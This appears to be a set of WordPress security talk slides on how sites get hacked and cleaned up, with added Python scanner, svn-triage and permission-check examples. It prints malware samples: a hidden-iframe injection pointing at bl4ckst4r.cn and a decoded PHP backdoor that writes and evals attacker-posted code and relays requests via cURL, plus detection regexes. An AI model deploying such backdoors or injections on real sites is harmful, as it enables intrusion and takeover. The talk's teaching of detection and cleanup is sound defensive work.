Wordpress Security


Hardening your WordPress Installation http://johnford.is/ @iamjohnford


Who, why, what, and how to fix it


Who does this crap?


http://flic.kr/p/8gKpiG


http://flic.kr/p/8rW6hU


http://flic.kr/p/5AU3Lp


Smoking Asthmatic Clown (SAC)




Why do SACs exist?


What do SACs do?




document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%62%6C%34%63%6B%73%74%34%72%2E%63%6E%2F%62%6C%6F%67%2F%67%6F%2E%70%68%70%3F%73%69%64%3D%31%37%27%20%77%69%64%74%68%3D%27%30%27%20%68%65%69%67%68%74%3D%27%30%27%3E%3C%2F%69%66%72%61%6D%65%3E'));


<iframe src='http://bl4ckst4r.cn/blog/go.php?sid=17' width='0' height='0'></iframe>



<?php eval(base64_decode("[long base64 blob omitted; the decoded PHP follows]"));


<?php
$delim = " ";
echo $delim;
error_reporting(E_ALL);
if(!empty($_POST['data'])) {
    $post['data'] = $_POST['data'];
    if(!empty($_POST['url'])) {
        // Relay mode: a serialized list of URLs arrives base64-encoded; the first one is
        // fetched (or, for ftp://, uploaded to) and the remainder is passed along.
        $tmp = base64_decode($_POST['url']);
        $urls_array = unserialize($tmp);
        $url = array_shift($urls_array);
        if(!empty($urls_array) AND count($urls_array)>0) {
            $tmp = serialize($urls_array);
            $post['url'] = base64_encode($tmp);
        }
        $tmp = parse_url($url);
        if($tmp['scheme']=="ftp") {
            echo "trying to update file[ ".$tmp['path']." ] via FTP\n";
            $file = 'tmp.php';
            $content = unserialize(base64_decode($post['data']));
            $content = base64_decode($content['content']);
            $fp = fopen($file, 'w');
            fwrite($fp, $content);
            fclose($fp);
            chmod($file, 0777);
            $fp = fopen($file,'r');
            $post = false;
        } else {
            echo "Sending request to: $url \n";
            $fp = false;
        }
        $content = request($url, $post, $fp);
        if($tmp['scheme']=="ftp") {
            fclose($fp);
            unlink($file);
        }
        if($tmp['scheme']=="ftp" AND $content!==false) echo "FTP: UPDATED\n";
        else echo $delim.$content;
    } else {
        // Dropper mode: the POST body is a serialized list of entries {n: path, c: content};
        // each one is written to disk world-writable, or eval'd directly when n == 'ev'.
        $tmp = base64_decode($post['data']);
        $data = unserialize($tmp);
        if(empty($data) OR !is_array($data)) {
            exit("Some error while saving;");
        }
        foreach ($data AS $d) {
            if(dirname($d['n'])!='.' and !file_exists(dirname($d['n']))) {
                mkdir(dirname($d['n']), 0777);
                chmod(dirname($d['n']), 0777);
            }
            if($d['n']=='ev') {
                eval($d['c']);
                continue;
            }
            $f = fopen($d['n'], 'w');
            $bytes_written = fwrite($f, $d['c']);
            fclose($f);
            if(filesize($d['n'])>10) {
                echo "file:".$d['n'].": saved\n";
            } else {
                echo "some error happens: ".$d['n']." size is: ".filesize($d['n'])." bytes\n";
            }
            if(!@chmod($d['n'], 0777)) {
                echo "some error with: ".$d['n']."\n";
            }
        }
    }
} else {
    die("NO DATA");
}
// Outbound helper: plain GET, POST, or a cURL upload of the file handle opened above.
function request($url, $post=false, $fp=false, $timeout=150){
    $ch = curl_init();
    if($post) {
        $post = is_array($post)?http_build_query($post):$post;
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    }
    if($fp) {
        curl_setopt($ch, CURLOPT_UPLOAD, 1);
        curl_setopt($ch, CURLOPT_INFILE, $fp);
        fclose($fp);
    }
    curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $content = curl_exec($ch);
    $error = curl_error($ch);
    if($error) {
        echo "CURL_ERROR: ".$error."\n";
        return false;
    }





Why are these attacks bad?




How does your site get SACed & how do you stop SACholes?


Guess your password



IsJFs@WCNYC2k10 (from "I saw John Ford speak at WordCamp NYC 2010")


Exploit old versions of WordPress



Exploit vulnerable themes and plugins





eval(gzuncompress(base64_decode('[long base64 blob omitted]')));


File permissions http://codex.wordpress.org/Changing_File_Permissions


// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wcnyc2010');

/** MySQL database username */
define('DB_USER', 'wcnyc2010');

/** MySQL database password */
define('DB_PASSWORD', '3^?wb6mhqsiyk^ABHR6y');

/** MySQL hostname */
define('DB_HOST', 'mysql.myserver.com');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');



/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         '2FO}Z*-a#4E9Ft5$kBzZ_kk|Z3@zR+fRV`{$axu|r}(dE-Akbziu #-BLmd%qV-y');
define('SECURE_AUTH_KEY',  '*E~-xU9xLhB[iv|8fUi7[{?=KS;E 0Cq#!NP, &]/oQwc1EkkR4A(c:x76f/w]Q)');
define('LOGGED_IN_KEY',    '&psh-W)gE_~qK$kL{qT~2(XPyT<FAc}!=&{(SL!.?y9ObiYgNmdqohdH<t5/KO4=');
define('NONCE_KEY',        'x&Im0c}brod3Cl%;jWJub<liaf:rFV#67F-E*o&$r90I/LSLP8Nz`Gb!R*H:J;4}');
define('AUTH_SALT',        'eO7i!tPIz[@dq.[mY`5zPu4x_b`K^6NTPK:%JwZdGCoo||)O}6aZ7>Y jb84mlxi');
define('SECURE_AUTH_SALT', '/a60,@Uf]/S$xHHQ]Dq/xB:zx^#%0<w#vPv|9go@y#c|*PW# bKE]|S&#-JJ}F65');
define('LOGGED_IN_SALT',   'IEP|]D`QVwDSg*t|[V>Jy]I^H~Q rfou+^wkV?FDbBO%fpg-(WH~v]7!_3M|&m(-');
define('NONCE_SALT',       'hnrbdh|-~=%>qC7Cbl33$=J~!F}SS*(*Fkl,uh8=7+u(b45|WtKe%S32r]3X~k/W');






http://wiki.mediatemple.net/w/File_Permissions




Obscurity





Cross tool exploits


Multiple sites on the same server


A non-WordPress exploit


Use a different database user/pass for each site


Hardening WordPress http://codex.wordpress.org/Hardening_WordPress


What do you do if your site has been SACed?


Back up your exploited site


FAQ My site was hacked http://codex.wordpress.org/FAQ_My_site_was_hacked


Change all passwords and keys


// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wcnyc2010');

/** MySQL database username */
define('DB_USER', 'wcnyc2010');

/** MySQL database password */
define('DB_PASSWORD', '3^?wb6mhqsiyk^ABHR6y');

/** MySQL hostname */
define('DB_HOST', 'mysql.myserver.com');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');


/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         '2FO}Z*-a#4E9Ft5$kBzZ_kk|Z3@zR+fRV`{$axu|r}(dE-Akbziu #-BLmd%qV-y');
define('SECURE_AUTH_KEY',  '*E~-xU9xLhB[iv|8fUi7[{?=KS;E 0Cq#!NP, &]/oQwc1EkkR4A(c:x76f/w]Q)');
define('LOGGED_IN_KEY',    '&psh-W)gE_~qK$kL{qT~2(XPyT<FAc}!=&{(SL!.?y9ObiYgNmdqohdH<t5/KO4=');
define('NONCE_KEY',        'x&Im0c}brod3Cl%;jWJub<liaf:rFV#67F-E*o&$r90I/LSLP8Nz`Gb!R*H:J;4}');
define('AUTH_SALT',        'eO7i!tPIz[@dq.[mY`5zPu4x_b`K^6NTPK:%JwZdGCoo||)O}6aZ7>Y jb84mlxi');
define('SECURE_AUTH_SALT', '/a60,@Uf]/S$xHHQ]Dq/xB:zx^#%0<w#vPv|9go@y#c|*PW# bKE]|S&#-JJ}F65');
define('LOGGED_IN_SALT',   'IEP|]D`QVwDSg*t|[V>Jy]I^H~Q rfou+^wkV?FDbBO%fpg-(WH~v]7!_3M|&m(-');
define('NONCE_SALT',       'hnrbdh|-~=%>qC7Cbl33$=J~!F}SS*(*Fkl,uh8=7+u(b45|WtKe%S32r]3X~k/W');


Remove rogue code


http://wordpress.org/extend/plugins/exploit-scanner/
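A small file scanner for the "Remove rogue code" step, covering the three patterns the earlier slides show (eval(base64_decode(...)) and eval(gzuncompress(base64_decode(...))) in PHP, document.write(unescape(...)) in JavaScript, and a zero-size iframe in HTML). This is an added example, not code from the deck or from the exploit-scanner plugin; the sample file contents and the temp-dir layout it scans are constructed for the demo.

```python
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

SIGNATURES = {
    # eval(base64_decode("...")) and eval(gzuncompress(base64_decode('...')))
    "eval_base64": re.compile(
        r"eval\s*\(\s*(?:gzuncompress|gzinflate|str_rot13)?\s*\(?\s*base64_decode\s*\(", re.I),
    # document.write(unescape('%3C%69%66...')): percent-encoded markup written at load time
    "js_unescape_write": re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I),
    # an iframe with width or height 0, i.e. invisible to the visitor
    "zero_iframe": re.compile(r"<iframe[^>]*\b(?:width|height)\s*=\s*['\"]?0['\"]?[^>]*>", re.I),
}

def scan_text(text: str) -> List[Tuple[str, int]]:
    """Return (signature name, 1-based line number) for every hit, in line order."""
    hits = set()
    for name, pattern in SIGNATURES.items():
        for m in pattern.finditer(text):
            hits.add((name, text.count("\n", 0, m.start()) + 1))
    return sorted(hits, key=lambda h: (h[1], h[0]))

def scan_tree(root: Path, exts=(".php", ".js", ".html", ".htm")) -> Dict[str, List[Tuple[str, int]]]:
    """Scan every file under root with a matching extension; map relative path -> hits."""
    findings = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                findings[path.relative_to(root).as_posix()] = hits
    return findings

# Constructed samples modelled on the slides' payloads (short, inert fragments).
SAMPLE_INFECTED_PHP = ("<?php\n// harmless line\n"
                       "eval(gzuncompress(base64_decode('eJzcvdtyHMmS')));\n"
                       "eval(base64_decode(\"Pz48P3BocA0K\"));\n")
SAMPLE_INFECTED_JS = "document.write(unescape('%3C%69%66%72%61%6D%65%3E'));\n"
SAMPLE_INFECTED_HTML = "<p>hi</p>\n<iframe src='http://example.invalid/x' width='0' height='0'></iframe>\n"
SAMPLE_CLEAN_PHP = "<?php\n$raw = base64_decode($_POST['blob']); // decode without eval: not flagged\n"

def demo() -> Dict[str, List[Tuple[str, int]]]:
    """Write the samples into a throwaway WordPress-like tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wp-content/themes/twentyten").mkdir(parents=True)
        (root / "wp-content/themes/twentyten/404.php").write_text(SAMPLE_INFECTED_PHP)
        (root / "wp-settings.php").write_text(SAMPLE_CLEAN_PHP)
        (root / "index.html").write_text(SAMPLE_INFECTED_HTML + SAMPLE_INFECTED_JS)
        return scan_tree(root)
```

Treat a hit as a lead to inspect rather than proof: a plugin that legitimately base64-decodes data will not match, but an attacker can split or rename the calls, so pair this with the Subversion diff approach on the next slides.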


Subversion http://codex.wordpress.org/Installing/Updating_WordPress_with_Subversion


machine:www user$ svn status
?       wp-config.php
?       .htaccess
M       index.php
?       wp-content/cache
X       wp-content/plugins/akismet
M       wp-content/themes/twentyten/404.php
?       wp-admin/meta

Performing status on external item at 'wp-content/plugins/akismet'
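Triage logic for an svn status listing like the one above: versioned files that changed (the M lines) go to the diff step, untracked files that a WordPress checkout does not normally have get flagged, and known untracked paths and externals are ignored. This is an added example, not from the deck; the allow-list of expected untracked paths is an assumption and the sample listing is constructed from the slide.

```python
import re
from typing import Dict, List, Tuple

# Untracked paths a WordPress-from-Subversion checkout normally has (an assumed allow-list;
# extend it with your own cache/upload directories).
EXPECTED_UNTRACKED = {"wp-config.php", ".htaccess", "wp-content/cache", "wp-content/uploads"}

# Constructed from the `svn status` listing on the slide.
SAMPLE_STATUS = """\
?       wp-config.php
?       .htaccess
M       index.php
?       wp-content/cache
X       wp-content/plugins/akismet
M       wp-content/themes/twentyten/404.php
?       wp-admin/meta

Performing status on external item at 'wp-content/plugins/akismet'
"""

# Column 1 of an `svn status` line is the item status; columns 2-7 are property, lock,
# history, switch and conflict flags. Informational lines do not fit this shape.
_ITEM_LINE = re.compile(r"^([ ACDIMRX?!~])[ ACDKLMRSX+]{0,6}\s+(\S.*)$")

def parse_svn_status(output: str) -> List[Tuple[str, str]]:
    """Return (status code, path) for every item line in the output."""
    items = []
    for line in output.splitlines():
        m = _ITEM_LINE.match(line)
        if m and m.group(1) != " ":
            items.append((m.group(1), m.group(2)))
    return items

def triage(output: str) -> Dict[str, List[str]]:
    """Bucket the entries: 'modified' versioned files (diff them, then restore with
    `svn revert` once the compromised copy is backed up), 'unexpected_untracked' files
    outside the allow-list (candidates for removal), and 'expected' noise."""
    buckets = {"modified": [], "unexpected_untracked": [], "expected": []}
    for code, path in parse_svn_status(output):
        known = path in EXPECTED_UNTRACKED or any(
            path.startswith(p + "/") for p in EXPECTED_UNTRACKED)
        if code in "MRD!~C":
            buckets["modified"].append(path)
        elif code == "?" and not known:
            buckets["unexpected_untracked"].append(path)
        else:
            buckets["expected"].append(path)
    return buckets
```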


machine:www user$ svn diff wp-content/themes/twentyten/404.php Index: wp-content/themes/twentyten/404.php =================================================================== --- wp-content/themes/twentyten/404.php (revision 15819) +++ wp-content/themes/twentyten/404.php (working copy) @@ -1,3 +1,5 @@ +<?php echo "<h1>Here's some code that really shouldn't be here</h1>"; ?> + <?php /** * The template for displaying 404 pages (Not Found).
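Review bot: the two added lines at the top of wp-content/themes/twentyten/404.php (an echo of an h1 element followed by a blank line) sit before the template's own opening PHP docblock and have no place in a stock Twenty Ten 404 template, so this M entry is injected code rather than a site customization. Keep a copy of the modified file as evidence first (the deck's "back up your exploited site" step), then return it to revision 15819 with svn revert, and give index.php and the unversioned wp-admin/meta from the status listing the same look, since injected code rarely lands in a single file.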



Check file permissions
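A permission checker for this step, added here as an example rather than taken from the deck or the Codex pages it links. It walks an install and reports world-writable entries, a wp-config.php that 'other' can read, and setuid/setgid files; the targets it assumes (directories 755, files 644, wp-config.php 440 or 400) are the Codex recommendations, and the demo tree with its two typical mistakes is constructed in a temp dir.

```python
import stat
import tempfile
from pathlib import Path
from typing import List, Tuple

def check_permissions(root: Path) -> List[Tuple[str, str, str]]:
    """Return (relative path, octal mode, problem) for every offending entry under root."""
    problems = []
    for path in [root, *root.rglob("*")]:
        if path.is_symlink():
            continue  # a symlink's own mode bits carry no meaning
        mode = stat.S_IMODE(path.stat().st_mode)
        rel = path.relative_to(root).as_posix()
        if mode & stat.S_IWOTH:
            problems.append((rel, oct(mode), "world-writable"))
        if path.name == "wp-config.php" and mode & stat.S_IROTH:
            problems.append((rel, oct(mode), "wp-config.php readable by others"))
        if path.is_file() and mode & (stat.S_ISUID | stat.S_ISGID):
            problems.append((rel, oct(mode), "setuid/setgid bit set"))
    return problems

def demo() -> List[Tuple[str, str, str]]:
    """Build a small constructed install with two common mistakes and check it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wp-content/uploads").mkdir(parents=True)
        (root / "wp-content").chmod(0o755)
        (root / "wp-content/uploads").chmod(0o777)   # the "just make it writable" mistake
        for name in ("wp-config.php", "index.php"):
            (root / name).write_text("<?php // constructed placeholder\n")
            (root / name).chmod(0o644)               # fine for index.php, too open for wp-config.php
        return check_permissions(root)
```

Upload directories do need to be writable by the web server user, which is a matter of owner or group, not the 'other' bits this check flags.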


Restore from backup


You are backing up, right?


http://flic.kr/p/5AU3Lp


?


Thank you! http://johnford.is/ @iamjohnford

